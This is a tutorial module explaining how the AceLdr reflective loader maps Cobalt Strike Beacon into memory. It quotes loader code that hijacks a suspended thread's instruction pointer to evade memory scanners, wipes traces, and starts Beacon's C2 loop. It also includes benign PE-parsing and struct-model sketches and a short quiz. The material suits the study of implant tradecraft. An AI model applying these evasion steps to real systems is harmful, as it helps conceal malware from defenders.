Module 4: Reflective DLL Loading
Loading a DLL without Windows ever knowing about it.
What Makes It "Reflective"?
Normally, you call LoadLibrary("beacon.dll") and Windows handles everything: it maps the file, resolves imports, and applies relocations. But that leaves traces: the module appears in the PEB module list, its memory is file-backed, and the load can show up in event logs. Reflective loading means the DLL loads itself from raw bytes in memory, bypassing the Windows loader entirely. No file on disk, no entry in the module list.
Why "Reflective"?
The term was coined by Stephen Fewer. The idea is that the loader is contained within the DLL itself - it "reflects" back to parse and load its own PE structure. In AceLdr's case, the loader (position-independent shellcode) is prepended to the Beacon DLL. When executed, it parses the attached PE, maps it into memory, and runs it. The entire process happens without touching the filesystem or the Windows loader.
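To make "parses the attached PE" concrete, here is a minimal sketch of the first header fields any PE parser reads. It is not AceLdr's code: the names pe_summary and pe_summarize are hypothetical, and it works on a plain byte buffer with offsets taken from the PE/COFF format, so it compiles without Windows headers.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical summary of the header fields a PE parser reads first. */
typedef struct {
    uint16_t number_of_sections;
    uint32_t entry_point_rva;
    uint32_t size_of_image;
} pe_summary;

/* Little-endian reads, done byte by byte so host endianness does not matter. */
static uint16_t rd16(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns 0 on success, -1 if the buffer is not a plausible PE image. */
static int pe_summarize(const uint8_t *buf, size_t len, pe_summary *out)
{
    /* DOS header: "MZ" magic, e_lfanew (offset of NT headers) at 0x3C. */
    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z')
        return -1;
    uint32_t nt = rd32(buf + 0x3C);

    /* Need signature (4) + file header (20) + optional header up to
       and including SizeOfImage (60 bytes). */
    if (nt > len || len - nt < 4 + 20 + 60)
        return -1;
    if (memcmp(buf + nt, "PE\0\0", 4) != 0)
        return -1;

    /* File header follows the signature; NumberOfSections is at +2. */
    out->number_of_sections = rd16(buf + nt + 4 + 2);

    /* Optional header follows the 20-byte file header. AddressOfEntryPoint
       (+16) and SizeOfImage (+56) sit at the same offsets in PE32 and PE32+. */
    const uint8_t *opt = buf + nt + 24;
    out->entry_point_rva = rd32(opt + 16);
    out->size_of_image   = rd32(opt + 56);
    return 0;
}
```

Calling pe_summarize() on a raw DLL buffer yields the section count, the entry point RVA, and the image size, which is the information a loader needs before it can size an allocation and walk the section table.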
AceLdr's Loading Sequence
The complete chain from shellcode injection to Beacon running, in 11 steps:
[Figure: Full Reflective Loading Pipeline]
Understanding Each Step
Steps 1-2 handle the initial execution and thread setup. Steps 3-5 prepare the runtime environment: resolving API functions, parsing the PE, and allocating memory. Steps 6-9 perform the actual loading: copying code, setting up the heap, and installing hooks. Step 10 hardens the memory by changing its protection from writable to executable. Step 11 finally hands control to Beacon.
Thread Hijacking via Ace()
AceLdr doesn't just call Loader() directly. It creates a suspended thread and overwrites its instruction pointer. This is a common technique to avoid having the loader's call stack visible during Beacon execution:
C - from ace.c
VOID Ace( VOID )
{
    API     Api;
    CONTEXT Ctx;
    HANDLE  Thread;

    // ... resolve NtGetContextThread, NtSetContextThread, etc.

    // Create a suspended thread at an innocent-looking start address
    // (RtlUserThreadStart + 0x21 is a ret instruction)
    PVOID StartAddress = Api.ntdll.RtlUserThreadStart + 0x21;
    Api.ntdll.RtlCreateUserThread(
        (HANDLE)-1,     // current process
        NULL, TRUE,     // suspended = TRUE
        0, 0, 0,
        StartAddress,   // innocent start address
        NULL, &Thread, NULL );

    // Hijack: overwrite RIP to point at our Loader function
    Ctx.ContextFlags = CONTEXT_CONTROL;
    Api.ntdll.NtGetContextThread( Thread, &Ctx );
    Ctx.Rip = (DWORD64) Loader;   // <-- The hijack
    Api.ntdll.NtSetContextThread( Thread, &Ctx );

    // Resume the thread - it now executes Loader() instead
    Api.ntdll.NtResumeThread( Thread, NULL );

    // Clean up evidence
    RtlSecureZeroMemory( &Api, sizeof(Api) );
    RtlSecureZeroMemory( &Ctx, sizeof(Ctx) );
}
Why Not Just Call Loader() Directly?
If AceLdr called Loader() directly, the call stack during Beacon execution would trace all the way back through the injection point. When memory scanners inspect sleeping threads, they examine the call stack. A clean thread created via RtlCreateUserThread with its RIP hijacked to Loader() has a much more innocuous-looking stack. The original thread (which ran the shellcode) can then exit, so its frames never appear in the stack of the thread that runs Beacon.
The STUB Structure
AceLdr's STUB structure sits at the very beginning of the allocated region and acts as the control block for all hook functions:
C - from include.h
typedef struct __attribute__(( packed ))
{
    ULONG_PTR Region;   // Base address of entire allocation
    ULONG_PTR Size;     // Total size of allocation
    HANDLE    Heap;     // Handle to private heap
} STUB, *PSTUB;
This compact structure (24 bytes on x64: three 8-byte fields) contains everything AceLdr's hooks need at runtime:
- Region: The base address, needed by the sleep hook to know what memory region to encrypt/decrypt
- Size: Total allocation size, so the sleep hook knows how many bytes to encrypt
- Heap: The private heap handle, returned by GetProcessHeap_Hook()
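The layout described above can be checked with a small portable model. This is a sketch under stated assumptions, not AceLdr's code: stub_model uses uintptr_t in place of ULONG_PTR and void * in place of HANDLE so that it compiles off Windows, and stub_contains is a hypothetical helper that shows how Region and Size together delimit the allocation.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Portable stand-in for STUB (assumption: uintptr_t replaces ULONG_PTR,
   void * replaces HANDLE). The packed attribute mirrors the original. */
typedef struct __attribute__((packed)) {
    uintptr_t region;   /* base address of the entire allocation */
    uintptr_t size;     /* total size of the allocation */
    void     *heap;     /* private heap handle */
} stub_model;

/* Hypothetical helper: does addr fall inside [region, region + size)?
   Written as a subtraction so region + size cannot overflow. */
static int stub_contains(const stub_model *s, uintptr_t addr)
{
    return addr >= s->region && addr - s->region < s->size;
}
```

On a 64-bit target, sizeof(stub_model) is 24 and the heap field sits at offset 16, matching the three 8-byte fields in the original definition. On a 32-bit target the same structure would be 12 bytes.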
Memory Layout After Loading
[Figure: Memory Layout After Reflective Load]
Key Insight: Why the Stub Sits First
The hook functions need to know where the allocation starts (to encrypt it during sleep) and where the heap is (to redirect GetProcessHeap). By placing the STUB at the start and using position-independent addressing (OFFSET(Stub)), any hook function can find this data without global variables. The OFFSET macro (covered in Module 5) calculates the runtime address of the Stub relative to the current instruction pointer.
Executing Beacon: DllMain
After all loading steps are complete, AceLdr calls Beacon's DllMain entry point with two different reason values:
C - from ace.c executeBeacon()
// First call: Standard DLL initialization
DllMain( beaconBase, DLL_PROCESS_ATTACH, NULL );   // reason = 1

// Second call: Cobalt Strike-specific "start beacon" signal
DllMain( beaconBase, 4, NULL );                    // reason = 4 (Beacon init)
DllMain Reason Values
Reason 1 (DLL_PROCESS_ATTACH) is the standard Windows notification that a DLL has been loaded into a process. Beacon uses this to perform its initial setup. Reason 4 is not one of the values Windows itself passes to DllMain (those are 0 through 3); it is a Cobalt Strike-specific convention for User Defined Reflective Loaders (UDRL). It signals Beacon to begin its main C2 communication loop. This two-step initialization allows Beacon to differentiate between "I've been loaded" and "start operating."
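The two-step convention can be modeled as a plain dispatch on the reason value. The sketch below is a toy model and not Beacon's implementation: payload_state, model_entry, and the name REASON_BEACON_START are hypothetical, and the rule that a start request is rejected before initialization is an assumption made for illustration.

```c
#include <assert.h>

#define REASON_PROCESS_ATTACH 1u   /* same value as DLL_PROCESS_ATTACH */
#define REASON_BEACON_START   4u   /* hypothetical name for reason 4 */

/* Hypothetical state that an entry point might track across calls. */
typedef struct {
    int initialized;   /* set by the first call (reason 1) */
    int started;       /* set by the second call (reason 4) */
} payload_state;

/* Toy entry point: returns 1 if the reason was handled, 0 otherwise. */
static int model_entry(payload_state *st, unsigned reason)
{
    switch (reason) {
    case REASON_PROCESS_ATTACH:
        st->initialized = 1;        /* "I've been loaded" */
        return 1;
    case REASON_BEACON_START:
        if (!st->initialized)       /* assumption: start requires init */
            return 0;
        st->started = 1;            /* "start operating" */
        return 1;
    default:
        return 0;                   /* other reasons ignored in this model */
    }
}
```

Calling model_entry() with reason 1 and then reason 4 mirrors the order used by executeBeacon(). Keeping the two signals separate lets a loader finish its own work between "loaded" and "start".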
Pop Quiz: Reflective Loading
Q1: Why does Ace() create a suspended thread instead of calling Loader() directly?
Q2: executeBeacon() calls DllMain with two different "reason" values. What are they?